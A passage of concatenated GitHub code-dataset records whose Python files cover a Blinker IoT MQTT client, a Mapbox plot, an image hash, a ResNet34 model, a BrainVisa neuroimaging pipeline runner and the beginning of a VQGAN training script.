print('你输入的是一个大于0,小于10的数')\nelif varl >=10:\n print('你输入的数大于或等于10')\nelse:\n print('你输入的为负数')\n\nfor i in range(5):\n #print(i ,end=' ') # 不换行\n #print(i,end='\\n') # 换行\n print(i,end = '\\t') # 空格\n","repo_name":"guandongling/deeptest","sub_path":"第一期/深圳--NLJY/005.py","file_name":"005.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"2616776605","text":"try:\n import modules.urequests as requests\nexcept ImportError:\n import requests\nimport ujson\nfrom modules.simple import MQTTClient\nfrom Blinker.BlinkerConfig import *\nfrom Blinker.BlinkerDebug import *\nfrom BlinkerUtility.BlinkerUtility import *\n\nclass MQTTProtocol(object):\n host = ''\n port = ''\n subtopic = ''\n pubtopic = ''\n deviceName = ''\n clientID = ''\n userName = ''\n password = ''\n uuid = ''\n msgBuf = ''\n isRead = False\n isAliRead = False\n isDuerRead = False\n state = CONNECTING\n isAlive = False\n isAliAlive = False\n isDuerAlive = False\n printTime = 0\n aliPrintTime = 0\n duerPrintTime = 0\n kaTime = 0\n aliKaTime = 0\n duerKaTime = 0\n debug = BLINKER_DEBUG\n smsTime = 0\n pushTime = 0\n wechatTime = 0\n weatherTime = 0\n aqiTime = 0\n\nclass BlinkerMQTT(MQTTProtocol):\n def checkKA(self):\n if self.isAlive is False:\n return False\n if (millis() - self.kaTime) < BLINKER_MQTT_KEEPALIVE:\n return True\n else:\n self.isAlive = False\n return False\n\n def checkAliKA(self):\n if self.isAliAlive is False:\n return False\n if 
(millis() - self.aliKaTime) < BLINKER_MQTT_KEEPALIVE:\n return True\n else:\n self.isAliAlive = False\n return False\n\n def checkDuerKA(self):\n if self.isDuerAlive is False:\n return False\n if (millis() - self.duerKaTime) < BLINKER_MQTT_KEEPALIVE:\n return True\n else:\n self.isDuerAlive = False\n return False\n\n def checkCanPrint(self):\n if self.checkKA() is False:\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n if (millis() - self.printTime) >= BLINKER_MQTT_MSG_LIMIT or self.printTime == 0:\n return True\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n\n def checkAliCanPrint(self):\n if self.checkAliKA() is False:\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n if (millis() - self.aliPrintTime) >= BLINKER_MQTT_MSG_LIMIT or self.aliPrintTime == 0:\n return True\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n\n def checkDuerCanPrint(self):\n if self.checkDuerKA() is False:\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n if (millis() - self.duerPrintTime) >= BLINKER_MQTT_MSG_LIMIT or self.duerPrintTime == 0:\n return True\n BLINKER_ERR_LOG(\"MQTT NOT ALIVE OR MSG LIMIT\")\n return False\n\n def checkSMS(self):\n if (millis() - self.smsTime) >= BLINKER_SMS_MSG_LIMIT or self.smsTime == 0:\n return True\n BLINKER_ERR_LOG(\"SMS MSG LIMIT\")\n return False\n\n def checkPUSH(self):\n if (millis() - self.pushTime) >= BLINKER_PUSH_MSG_LIMIT or self.pushTime == 0:\n return True\n BLINKER_ERR_LOG(\"PUSH MSG LIMIT\")\n return False\n\n def checkWECHAT(self):\n if (millis() - self.wechatTime) >= BLINKER_PUSH_MSG_LIMIT or self.wechatTime == 0:\n return True\n BLINKER_ERR_LOG(\"WECHAT MSG LIMIT\")\n return False\n\n def checkWEATHER(self):\n if (millis() - self.weatherTime) >= BLINKER_WEATHER_MSG_LIMIT or self.weatherTime == 0:\n return True\n BLINKER_ERR_LOG(\"WEATHER MSG LIMIT\")\n return False\n\n def checkAQI(self):\n if (millis() - self.aqiTime) >= BLINKER_AQI_MSG_LIMIT or self.aqiTime == 0:\n return True\n BLINKER_ERR_LOG(\"AQI MSG LIMIT\")\n return False\n\n def delay100ms(self):\n start = millis()\n time_run = 0\n while time_run < 100:\n time_run = millis() - start\n\n def delay10s(self):\n start = millis()\n time_run = 0\n while time_run < 10000:\n time_run = millis() - start\n\n def checkAuthData(self, data):\n if data['detail'] == BLINKER_CMD_NOTFOUND:\n while True:\n BLINKER_ERR_LOG(\"Please make sure you have put in the right AuthKey!\")\n self.delay10s()\n\n @classmethod\n def getInfo(cls, auth, aliType, duerType):\n host = 'https://iot.diandeng.tech'\n url = '/api/v1/user/device/diy/auth?authKey=' + auth\n\n if aliType :\n url = url + aliType\n\n if duerType :\n url = url + duerType\n\n r = requests.get(host + url)\n\n data = r.json()\n cls().checkAuthData(data)\n # if cls().isDebugAll() is True:\n BLINKER_LOG_ALL('Device Auth Data: ', data)\n \n data = r.json()\n deviceName = data['detail']['deviceName']\n iotId = data['detail']['iotId']\n iotToken = data['detail']['iotToken']\n productKey = data['detail']['productKey']\n uuid = data['detail']['uuid']\n broker = data['detail']['broker']\n\n bmt = cls()\n\n BLINKER_LOG_ALL('deviceName: ', deviceName)\n BLINKER_LOG_ALL('iotId: ', iotId)\n BLINKER_LOG_ALL('iotToken: ', iotToken)\n BLINKER_LOG_ALL('productKey: ', productKey)\n BLINKER_LOG_ALL('uuid: ', uuid)\n BLINKER_LOG_ALL('broker: ', broker)\n BLINKER_LOG_ALL('host + url: ', host + url)\n\n if broker == 'aliyun':\n bmt.host = BLINKER_MQTT_ALIYUN_HOST\n bmt.port = 
BLINKER_MQTT_ALIYUN_PORT\n else:\n bmt.host = data['detail']['host'].replace('mqtts://','')\n bmt.port = data['detail']['port']\n bmt.subtopic = '/device/' + deviceName + '/r'\n bmt.pubtopic = '/device/' + deviceName + '/s'\n bmt.clientID = deviceName\n bmt.userName = iotId\n bmt.deviceName = deviceName\n bmt.password = iotToken\n bmt.uuid = uuid\n\n # if bmt.isDebugAll() is True:\n BLINKER_LOG_ALL('clientID: ', bmt.clientID)\n BLINKER_LOG_ALL('userName: ', bmt.userName)\n BLINKER_LOG_ALL('password: ', bmt.password)\n BLINKER_LOG_ALL('subtopic: ', bmt.subtopic)\n BLINKER_LOG_ALL('pubtopic: ', bmt.pubtopic)\n return bmt\n\ndef on_message(topic, msg):\n BLINKER_LOG_ALL('payload: ', msg)\n data = ujson.loads(msg)\n\nclass MQTTClients():\n def __init__(self):\n self.auth = ''\n self._isClosed = False\n self.client = None\n self.bmqtt = None\n self.mProto = BlinkerMQTT()\n self.aliType = ''\n self.duerType = ''\n self.isMQTTinit = False\n self.mqttPing = 0\n\n def start(self, auth, aliType, duerType):\n self.auth = auth\n self.aliType = aliType\n self.duerType = duerType \n\n def on_message(self, topic, msg):\n BLINKER_LOG_ALL('payload: ', msg)\n data = ujson.loads(msg)\n fromDevice = data['fromDevice']\n data = data['data']\n data = ujson.dumps(data)\n BLINKER_LOG_ALL('fromDevice:', fromDevice, ', data: ', data)\n if fromDevice == self.bmqtt.uuid :\n BLINKER_LOG_ALL('from uuid')\n self.bmqtt.msgBuf = data\n self.bmqtt.isRead = True\n self.bmqtt.isAlive = True\n self.bmqtt.kaTime = millis()\n elif fromDevice == 'AliGenie':\n BLINKER_LOG_ALL('from aligenie')\n self.bmqtt.msgBuf = data\n self.bmqtt.isAliRead = True\n self.bmqtt.isAliAlive = True\n self.bmqtt.aliKaTime = millis() \n elif fromDevice == 'DuerOS':\n BLINKER_LOG_ALL('from dueros')\n self.bmqtt.msgBuf = data\n self.bmqtt.isDuerRead = True\n self.bmqtt.isDuerAlive = True\n self.bmqtt.duerKaTime = millis() \n\n def pub(self, msg, state=False):\n if state is False:\n if self.bmqtt.checkCanPrint() is False:\n return\n payload = {'fromDevice': self.bmqtt.deviceName, 'toDevice': self.bmqtt.uuid, 'data': msg , 'deviceType': 'OwnApp'}\n payload = ujson.dumps(payload)\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('Publish topic: ', self.bmqtt.pubtopic)\n BLINKER_LOG_ALL('payload: ', payload)\n self.client.publish(self.bmqtt.pubtopic, payload)\n self.bmqtt.printTime = millis()\n\n def aliPrint(self, msg):\n if self.bmqtt.checkAliCanPrint() is False:\n return\n payload = {'fromDevice': self.bmqtt.deviceName, 'toDevice': 'AliGenie_r', 'data': msg , 'deviceType': 'vAssistant'}\n payload = ujson.dumps(payload)\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('Publish topic: ', self.bmqtt.pubtopic)\n BLINKER_LOG_ALL('payload: ', payload)\n self.client.publish(self.bmqtt.pubtopic, payload)\n self.bmqtt.aliPrintTime = millis()\n\n def duerPrint(self, msg):\n if self.bmqtt.checkDuerCanPrint() is False:\n return\n payload = {'fromDevice': self.bmqtt.deviceName, 'toDevice': 'DuerOS_r', 'data': msg , 'deviceType': 'vAssistant'}\n payload = ujson.dumps(payload)\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('Publish topic: ', self.bmqtt.pubtopic)\n BLINKER_LOG_ALL('payload: ', payload)\n self.client.publish(self.bmqtt.pubtopic, payload)\n\n def sms(self, msg):\n if self.bmqtt.checkSMS() is False:\n return\n payload = ujson.dumps({'deviceName':self.bmqtt.deviceName, 'key': self.auth, 'msg': msg})\n response = requests.post('https://iot.diandeng.tech/api/v1/user/device/sms',\n data=payload, headers={'Content-Type': 
'application/json'})\n\n self.bmqtt.smsTime = millis()\n data = response.json()\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('response: ', data)\n if data[BLINKER_CMD_MESSAGE] != 1000:\n BLINKER_ERR_LOG(data[BLINKER_CMD_DETAIL])\n\n def push(self, msg):\n if self.bmqtt.checkPUSH() is False:\n return\n payload = ujson.dumps({'deviceName':self.bmqtt.deviceName, 'key': self.auth, 'msg': msg})\n response = requests.post('https://iot.diandeng.tech/api/v1/user/device/push',\n data=payload, headers={'Content-Type': 'application/json'})\n\n self.bmqtt.pushTime = millis()\n data = response.json()\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('response: ', data)\n if data[BLINKER_CMD_MESSAGE] != 1000:\n BLINKER_ERR_LOG(data[BLINKER_CMD_DETAIL])\n\n def wechat(self, title, state, msg):\n if self.bmqtt.checkWECHAT() is False:\n return\n payload = ujson.dumps({'deviceName':self.bmqtt.deviceName, 'key': self.auth, 'title':title, 'state':state, 'msg': msg})\n response = requests.post('https://iot.diandeng.tech/api/v1/user/device/wxMsg/',\n data=payload, headers={'Content-Type': 'application/json'})\n\n self.bmqtt.pushTime = millis()\n data = response.json()\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('response: ', data)\n if data[BLINKER_CMD_MESSAGE] != 1000:\n BLINKER_ERR_LOG(data[BLINKER_CMD_DETAIL])\n\n def dataUpdate(self, msg):\n payload = ujson.dumps({'deviceName':self.bmqtt.deviceName, 'key': self.auth, 'data': msg})\n response = requests.post('https://iot.diandeng.tech/api/v1/user/device/cloudStorage/',\n data=payload, headers={'Content-Type': 'application/json'})\n\n self.bmqtt.pushTime = millis()\n data = response.json()\n # if self.bmqtt.isDebugAll() is True:\n BLINKER_LOG_ALL('response: ', data)\n if data[BLINKER_CMD_MESSAGE] != 1000:\n BLINKER_ERR_LOG(data[BLINKER_CMD_DETAIL])\n return False\n return True\n\n def weather(self, city):\n if self.bmqtt.checkWEATHER() is False:\n return\n host = 'https://iot.diandeng.tech'\n url = '/api/v1/user/device/weather/now?deviceName=' + self.bmqtt.deviceName + '&key=' + self.auth + '&location=' + city\n\n r = requests.get(url=host + url)\n data = ''\n\n self.bmqtt.weatherTime = millis()\n\n # if r.status_code != 200:\n # BLINKER_ERR_LOG('Device Auth Error!')\n # return\n # else:\n data = r.json()\n return data['detail']\n\n def aqi(self, city):\n if self.bmqtt.checkAQI() is False:\n return\n host = 'https://iot.diandeng.tech'\n url = '/api/v1/user/device/weather/now?deviceName=' + self.bmqtt.deviceName + '&key=' + self.auth + '&location=' + city\n\n r = requests.get(url=host + url)\n data = '' \n\n self.bmqtt.aqiTime = millis()\n\n # if r.status_code != 200:\n # BLINKER_ERR_LOG('Device Auth Error!')\n # return\n # else:\n data = r.json()\n return data['detail']\n\n def connect(self):\n if self.isMQTTinit is False :\n self.bmqtt = self.mProto.getInfo(self.auth, self.aliType, self.duerType)\n self.isMQTTinit = True\n self.client = MQTTClient(client_id = self.bmqtt.clientID, \n server = self.bmqtt.host, port = self.bmqtt.port, \n user = self.bmqtt.userName, password =self.bmqtt.password, \n keepalive = 60, ssl = True)\n self.client.set_callback(self.on_message)\n self.client.connect()\n self.client.subscribe(self.bmqtt.subtopic)\n\n self.mqttPing = millis()\n\n self.bmqtt.state = CONNECTED\n else :\n try:\n self.client.check_msg()\n self.mProto.delay100ms()\n except Exception as error:\n self.client.disconnect()\n MQTTClients.reconnect(self)\n\n def reconnect(self):\n try:\n MQTTClients.register(self)\n\n self.client = 
MQTTClient(client_id = self.bmqtt.clientID, \n server = self.bmqtt.host, port = self.bmqtt.port, \n user = self.bmqtt.userName, password =self.bmqtt.password, \n keepalive = 60, ssl = True)\n self.client.set_callback(self.on_message)\n self.client.connect(clean_session = True)\n self.client.subscribe(self.bmqtt.subtopic)\n except Exception as error:\n BLINKER_ERR_LOG('MQTT reconnect failed...')\n\n def register(self):\n self.bmqtt = self.mProto.getInfo(self.auth, self.aliType, self.duerType)\n","repo_name":"blinker-iot/blinker-mpy","sub_path":"BlinkerAdapters/BlinkerWiFi.py","file_name":"BlinkerWiFi.py","file_ext":"py","file_size_in_byte":14500,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"24017394551","text":"import plotly.graph_objects as go\nimport tkinter as tk\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport csv\n\n\ndef display(lat,lon):\n mapbox_access_token = open(\"mapbox_token\").read()\n\n fig = go.Figure(go.Scattermapbox(\n lat=lat,\n lon=lon,\n mode='markers',\n marker=go.scattermapbox.Marker(\n size=14\n ),\n text=['Brothers Launch Site'],\n ))\n\n fig.update_layout(\n hovermode='closest',\n mapbox=dict(\n accesstoken=mapbox_access_token,\n bearing=0,\n center=go.layout.mapbox.Center(\n lat=43.799088,\n lon=-120.650253\n ),\n pitch=0,\n zoom=25\n )\n )\n\n fig.show()\n","repo_name":"ECEUSLI-at-Oregon-State/Avionics_Firmware","sub_path":"gui/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21859113324","text":"#!/usr/bin/env python\n#coding:utf-8\nimport cv2\n\nclass smilar():\n def __init__(self, filename):\n img = cv2.imread(filename)\n self.s8 = cv2.resize(img, (8,8))\n\n gary = cv2.cvtColor(self.s8, cv2.COLOR_BGR2GRAY)\n\n val = cv2.mean(gary)\n\n self.__feature = []\n # for i in range(len(gary)):\n # g = gary[i]\n # for p in g:\n # if p > val:\n # self.__feature.append(1)\n # else:\n # self.__feature.append(0)\n\n def feature(self):\n return self.__feature\n\n def check(self, target):\n sm = 0\n for t, s in zip(target, self.__feature):\n if t != s:\n sm += 1\n #sm 数据越大,越不相似\n return sm\n","repo_name":"tcjinr20/dsimg","sub_path":"serach/smilar.py","file_name":"smilar.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14846649163","text":"import os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass Residual(nn.Sequential):\n def __init__(self, *layers):\n super().__init__(*layers)\n bns = [layer for layer in self.modules() if isinstance(layer, nn.BatchNorm2d)]\n last_bn = bns[-1]\n last_bn.weight.data.zero_()\n\n def forward(self, input):\n return input + super().forward(input)\n\n\ndef conv_block(c_in, c_out, ks=3, stride=1, activation=True):\n pad = (ks - 1) // 2 # preserve spatial dimension\n non_linearity = nn.ReLU() if activation else nn.Identity()\n return nn.Sequential(\n nn.Conv2d(c_in, c_out, ks, stride, pad, bias = False),\n nn.BatchNorm2d(c_out),\n non_linearity,\n )\n\n\ndef residual_block(c_in, c_out, ks=3, stride=1, repeat=None):\n if repeat is None:\n return nn.Sequential(\n Residual(\n conv_block(c_in, c_out, ks, stride),\n conv_block(c_out, c_out, ks, stride, activation=False),\n ),\n nn.ReLU(),\n )\n else:\n return nn.Sequential(\n *[residual_block(c_in, c_out, ks=3, stride=1) for _ in range(repeat)]\n )\n\n\ndef 
downsampling_block(c_in, c_out, ks=3):\n return nn.Sequential(\n conv_block(c_in, c_out, ks, 2),\n conv_block(c_out, c_out, ks, 1),\n )\n\n\ndef define_resnet34(n_classes = 120):\n return nn.Sequential(\n conv_block(3, 64, 3, 1),\n downsampling_block(64, 64),\n downsampling_block(64, 64),\n residual_block(64, 64, repeat=3),\n downsampling_block(64, 128),\n residual_block(128, 128, repeat=3),\n downsampling_block(128, 256),\n residual_block(256, 256, repeat=5),\n downsampling_block(256, 512),\n residual_block(512, 512, repeat=2),\n nn.AvgPool2d(7),\n nn.Flatten(),\n nn.Linear(512, n_classes),\n )\n\nmodel = define_resnet34()\n","repo_name":"Venzel13/computer_vision","sub_path":"resnet34.py","file_name":"resnet34.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"19138043906","text":"import os\nimport argparse\nimport glob\n\nDEBUG = True\n\nif DEBUG:\n\t# Main folders testing\n\tMAINDIR = '/ifs/loni/faculty/njahansh/nerds/FABRIZIO/ENIGMA_SULCI53/ENIGMA_BV45/sulcus-parameterization-pipeline/' #Scripts Folder\n\tBVDIR = '/ifs/loni/faculty/njahansh/nerds/FABRIZIO/ABCD/recomT1/bv_dir_final2/' # Folder containing subjects processed with brainvisa\n\t#FSDIR = '/home/zaffaro/Desktop/fs_subjects' # INPUTS, folder containing subjects processed with freesurfer\n\tFSDIR = '/ifs/loni/faculty/njahansh/nerds/FABRIZIO/ABCD/recomT1/fs71_4mb/'\n\t#BVHOME = 'brainvisa-4.5.0-mandriva'\n\tBVHOME = '/ifs/loni/faculty/njahansh/nerds/FABRIZIO/ENIGMA_SULCI53/brainvisa-5.0.3/'\n\tBV_VER = 5\n\tscriptDIR = os.path.join(BVDIR, 'BV_scripts')\nelse:\n\t# Main folders\n\tMAINDIR = '/usr/local/ENIGMA50/' #Scripts Folder\n\tBVDIR = '/usr/local/bv_dir' # Folder containing subjects processed with brainvisa\n\tFSDIR = '/usr/local/fs_sbj' # INPUTS, folder containing subjects processed with freesurfer\n\t#BVHOME = '/usr/local/brainvisa-5.0.2'\n\tBVHOME = '/usr/local/brainvisa-4.5' #os.path.join(os.environ['HOME'], 'brainvisa-5.0.2\n\tBV_VER = 4\n\tscriptDIR = os.path.join(BVDIR, 'BV_scripts')\n\n\ndef folder_creation(SUBJECT):\n\t# Main folders creation\n\tif not os.path.exists(BVDIR):\n\t\tos.makedirs(BVDIR)\n\tif not os.path.exists(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/registration')):\n\t\tos.makedirs(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/registration'))\n\tif not os.path.exists(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/default_analysis')):\n\t\tos.makedirs(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/default_analysis'))\n\tif not os.path.exists(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/default_analysis/segmentation')):\n\t\tos.makedirs(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/default_analysis/segmentation'))\n\tif not os.path.exists(scriptDIR):\n\t\tos.makedirs(scriptDIR)\n\t# Not sure it is correct to define the database for every subject.\n\tDATABASE_PATH = BVDIR # os.path.join(os.path.dirname(os.path.realpath(__file__)), 'database')\n\tif not os.path.exists(DATABASE_PATH):\n\t\tcreate_database(DATABASE_PATH)\n\n\ndef create_database(DATABASE_PATH):\n\t#CREATE DATABASE\n\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/template_create_database.bvproc')\n\tfile_parsed_template_path = os.path.join(scriptDIR, 'create_database.bvproc')\n\tf_in = open(file_template_path, 'r')\n\tf_out = open(file_parsed_template_path, 'w')\n\n\tfor line in 
f_in:\n\t\t#read replace the string and write to output file\n\t\tline = line.replace('DATABASE_PATH', DATABASE_PATH)\n\t\tf_out.write(line)\n\t#close input and output files\n\tf_in.close()\n\tf_out.close()\n\n\t# the scriptDIR has to be the current working directory to run bvproc scripts\n\tos.chdir(scriptDIR)\n\tos.system(f'{BVHOME}/bin/bv axon-runprocess --enabledb {file_parsed_template_path}')\n\n\ndef convert_freesurfer_to_brainvisa(SUBJECT):\n\t#IMPORT FREESURFER\n\tif BV_VER == 4:\n\t\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/template_fs_import_4.5_ok.bvproc')\n\telse:\n\t\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/import_freesurfer_bv503.bvproc')\n\tfile_parsed_template_path = os.path.join(scriptDIR, f'{SUBJECT}_fs_import_ok.bvproc')\n\tf_in = open(file_template_path, 'r')\n\tf_out = open(file_parsed_template_path, 'w')\n\n\tfor line in f_in:\n\t\t#read replace the string and write to output file\n\t\tline = line.replace('BVDIR', BVDIR)\n\t\tline = line.replace('SUBJECT', SUBJECT)\n\t\tline = line.replace('subjid', SUBJECT)\n\t\tline = line.replace('FSDIR', FSDIR)\n\t\tline = line.replace('BVHOME', BVHOME)\t\n\t\tf_out.write(line)\n\t#close input and output files\n\tf_in.close()\n\tf_out.close()\n\n\t# the scriptDIR has to be the current working directory to run bvproc scripts\n\tos.chdir(scriptDIR)\n\t#os.system(f'{BVHOME}/bin/brainvisa -r {file_parsed_template_path} --enable-db')\n\tos.system(f'{BVHOME}/bin/bv axon-runprocess --enabledb {file_parsed_template_path}')\n\n\ndef run_morphologist(SUBJECT):\n\t#MORPHOLOGIST PIPELINE\n\tif BV_VER == 4:\n\t\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/template_T1_4.5_ok.bvproc')\n\telse:\n\t\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/template_morphologist_503.bvproc')\n\tfile_parsed_template_path = os.path.join(scriptDIR, f'{SUBJECT}_morphologist_503.bvproc')\n\tf_in = open(file_template_path, 'r')\n\tf_out = open(file_parsed_template_path, 'w')\n\n\tfor line in f_in:\n\t\t#read replace the string and write to output file\n\t\tline = line.replace('BVDIR', BVDIR)\n\t\tline = line.replace('SUBJECT', SUBJECT)\n\t\tline = line.replace('BVHOME', BVHOME)\t\n\t\tf_out.write(line)\n\t#close input and output files\n\tf_in.close()\n\tf_out.close()\n\n\t# the scriptDIR has to be the current working directory to run bvproc scripts\n\tos.chdir(scriptDIR)\n\tos.system(f'{BVHOME}/bin/bv axon-runprocess {file_parsed_template_path}')\n\ndef remove_lock(BVDIR,subj):\n\n\tsubj_dir= os.path.join(BVDIR, 'subjects',subj)\n\tfor root, dirs, files in os.walk(subj_dir):\n\t\tfor file in files:\n\t\t\tif (file.endswith(\".lock\")):\n\t\t\t\tprint(os.path.join(root, file))\n\t\t\t\tos.remove(os.path.join(root, file))\n\n\ndef main():\n\t#Settings\n\tparser = argparse.ArgumentParser(description='BrainVisa Cortical Surface pipeline')\n\tparser.add_argument('--subject', '-s', type=str, help=\"subject ID\")\n\tparser.add_argument('--list', '-l', action='store_true', help=\"folder with subjects\")\n\targs = parser.parse_args()\n\n\tif not (args.list or args.subject):\n\t\tparser.error('No action requested, add --list or --subject')\n\n\t\n\tif args.list:\n\t\tsubjects_path = os.path.join(BVDIR, 'subjects')\n\t\tsubjects = [f for f in os.listdir(subjects_path) if (os.path.isdir(os.path.join(subjects_path, f)))]\n\n\t\tfor sbj in subjects:\n\t\t\t# remove .lock files\n\t\t\tremove_lock(BVDIR, sbj)\n\n\t\t\t#Brainvisa pipeline\n\t\t\tprint(f'*** {sbj} Morphologist pipeline started 
***\n')\n\t\t\tfolder_creation(sbj)\n\t\t\tconvert_freesurfer_to_brainvisa(sbj)\n\t\t\t#run_morphologist(sbj)\n\t\t\tprint(f'*** {sbj} Removing .lock files ***\\n')\n\t\t\t#remove .lock files\n\t\t\tremove_lock(BVDIR, sbj)\n\telse:\n\t\tsbj = args.subject\n\t\t\n\t\t#Brainvisa pipeline\n\t\tprint(f'*** {sbj} Morphologist pipeline started ***\\n')\n\t\tfolder_creation(sbj)\n\t\tconvert_freesurfer_to_brainvisa(sbj)\n\t\trun_morphologist(sbj)\n\n\t\tprint(f'*** {sbj} Removing .lock files ***\\n')\n\t\t#remove .lock files\n\t\tremove_lock(BVDIR, sbj)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"mirkozaff/sulcus-parameterization-pipeline","sub_path":"run_brainvisa_morphologist.py","file_name":"run_brainvisa_morphologist.py","file_ext":"py","file_size_in_byte":6417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"17828527545","text":"import os\nfrom os.path import join as opj\nimport argparse \nimport datetime\nimport time\n\nimport numpy as np\nimport cv2\nimport torch\nimport torch.distributed as dist\nfrom torch.backends import cudnn\n\nfrom utils.util import *\nfrom datasets.dataloader import get_dataloader\nfrom models.VQGAN import VQGAN\ntorch.autograd.set_detect_anomaly(True)\n\ndef build_args(is_test=False):\n parser = argparse.ArgumentParser()\n\n #### dataset ####\n parser.add_argument(\"--data_root_dir\", type=str, default=\"/home/data\")\n parser.add_argument(\"--data_name\", type=str, default=\"CelebA-HQ-img\")\n parser.add_argument(\"--img_size_H\", type=int, default=256)\n parser.add_argument(\"--img_size_W\", type=int, default=256)\n parser.add_argument(\"--n_workers\", type=int, default=4)\n parser.add_argument(\"--in_ch\", type=int, default=3)\n\n #### model ####\n parser.add_argument(\"--ngf\", type=int, default=128)\n parser.add_argument(\"--ngf_mult\", default=[1,1,2,2,4])\n parser.add_argument(\"--resolution\", type=int, default=256)\n parser.add_argument(\"--attn_resolutions\", default=[16])\n parser.add_argument(\"--z_dim\", type=int, default=256)\n parser.add_argument(\"--n_embed\", type=int, default=1024)\n parser.add_argument(\"--embed_dim\", type=int, default=256)\n parser.add_argument(\"--beta\", type=float, default=0.25)\n parser.add_argument(\"--ndf\", type=int, default=64)\n parser.add_argument(\"--D_n_layers\", type=int, default=3)\n parser.add_argument(\"--num_res_blks\", type=int, default=2)\n parser.add_argument(\"--double_z\", type=bool, default=False)\n parser.add_argument(\"--D_use_actnorm\" ,type=bool, default=False)\n \n #### train & eval ####\n parser.add_argument(\"--n_iters\", type=int, default=50000000)\n parser.add_argument(\"--batch_size\", type=int, default=2)\n parser.add_argument(\"--val_batch_size\", type=int, default=128)\n parser.add_argument(\"--perceptual_weight\", type=float, default=1.0)\n parser.add_argument(\"--D_weight\", type=float, default=0.8)\n parser.add_argument(\"--D_thres_iter\", type=int, default=30001)\n parser.add_argument(\"--codebook_weight\", type=float, default=1.0)\n parser.add_argument(\"--G_lr\", type=float, default=4.5e-6)\n parser.add_argument(\"--D_lr\", type=float, default=4.5e-6)\n parser.add_argument(\"--betas\", default=(0.5, 0.9))\n parser.add_argument(\"--adv_loss_type\", type=str, default=\"hinge\")\n\n #### save & load ####\n parser.add_argument(\"--no_save\", type=bool, default=False)\n parser.add_argument(\"--save_root_dir\" ,type=str, default=\"/media/data1/jeonghokim/GANs/VQGAN\")\n parser.add_argument(\"--save_name\", type=str, 
default=\"\")\n parser.add_argument(\"--log_save_iter_freq\", type=int, default=200)\n parser.add_argument(\"--img_save_iter_freq\", type=int, default=5000)\n parser.add_argument(\"--model_save_iter_freq\", type=int, default=30000)\n parser.add_argument(\"--eval_iter_freq\", type=int, default=60000)\n #### config ####\n parser.add_argument(\"--use_DDP\", action=\"store_true\")\n\n args = parser.parse_args()\n args.save_name = f\"{datetime.datetime.now().strftime('%Y%m%d')}_\" + args.save_name\n args.is_test = is_test\n if is_test:\n args.use_DDP = False\n args.is_test = True\n args.no_save = True\n if args.use_DDP:\n args.local_rank = int(os.environ[\"LOCAL_RANK\"])\n torch.cuda.set_device(args.local_rank)\n dist.init_process_group(backend='nccl', timeout=datetime.timedelta(seconds=72000))\n args.n_gpus = dist.get_world_size()\n else:\n args.local_rank = 0\n args.n_gpus = 1\n args.save_dir = opj(args.save_root_dir, args.save_name)\n args.img_save_dir = opj(args.save_dir, \"save_images\")\n args.model_save_dir = opj(args.save_dir, \"save_models\")\n args.eval_save_dir = opj(args.save_dir, \"eval_save_images\")\n args.log_path = opj(args.save_dir, \"log.txt\")\n args.config_path = opj(args.save_dir, \"config.json\") \n if not args.no_save:\n os.makedirs(args.img_save_dir, exist_ok=True)\n os.makedirs(args.model_save_dir, exist_ok=True)\n os.makedirs(args.eval_save_dir, exist_ok=True)\n return args\ndef main_worker(args, logger):\n train_loader, valid_loader = get_dataloader(args)\n logger.write(f\"[Train] # of imgs : {len(train_loader.dataset)}\")\n logger.write(f\"1 epochs : {len(train_loader)} iters\")\n if args.local_rank == 0:\n save_args(args, args.config_path)\n model = VQGAN(args)\n model.print_n_params(logger)\n cur_iter = 1\n start_time = time.time()\n break_flag = False\n for epoch in range(1, 100000):\n loss_G_meter = AverageMeter()\n loss_D_meter = AverageMeter()\n for img in train_loader:\n img = img.cuda(args.local_rank)\n model.set_input(real_img=img)\n model.train(cur_iter)\n\n BS = img.shape[0]\n loss_G_meter.update(model.G_loss_val*2, BS)\n loss_D_meter.update(model.D_loss_val*2, BS)\n if cur_iter % args.log_save_iter_freq == 0:\n elapsed_time = str(datetime.timedelta(seconds=time.time() - start_time))[:-7]\n msg = 